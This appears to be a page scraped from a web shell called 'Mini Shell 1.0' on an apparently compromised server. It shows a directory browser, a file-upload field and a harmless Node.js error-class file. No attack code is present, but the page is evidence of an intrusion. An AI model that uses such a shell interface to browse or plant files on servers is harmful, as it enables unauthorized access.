HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/nodejs/http2-wrapper/source/proxies/
Upload File :
Current File : //proc/self/root/usr/share/nodejs/http2-wrapper/source/proxies/unexpected-status-code-error.js
'use strict';

class UnexpectedStatusCodeError extends Error {
	constructor(statusCode) {
		super(`The proxy server rejected the request with status code ${statusCode}`);
		this.statusCode = statusCode;
	}
}

module.exports = UnexpectedStatusCodeError;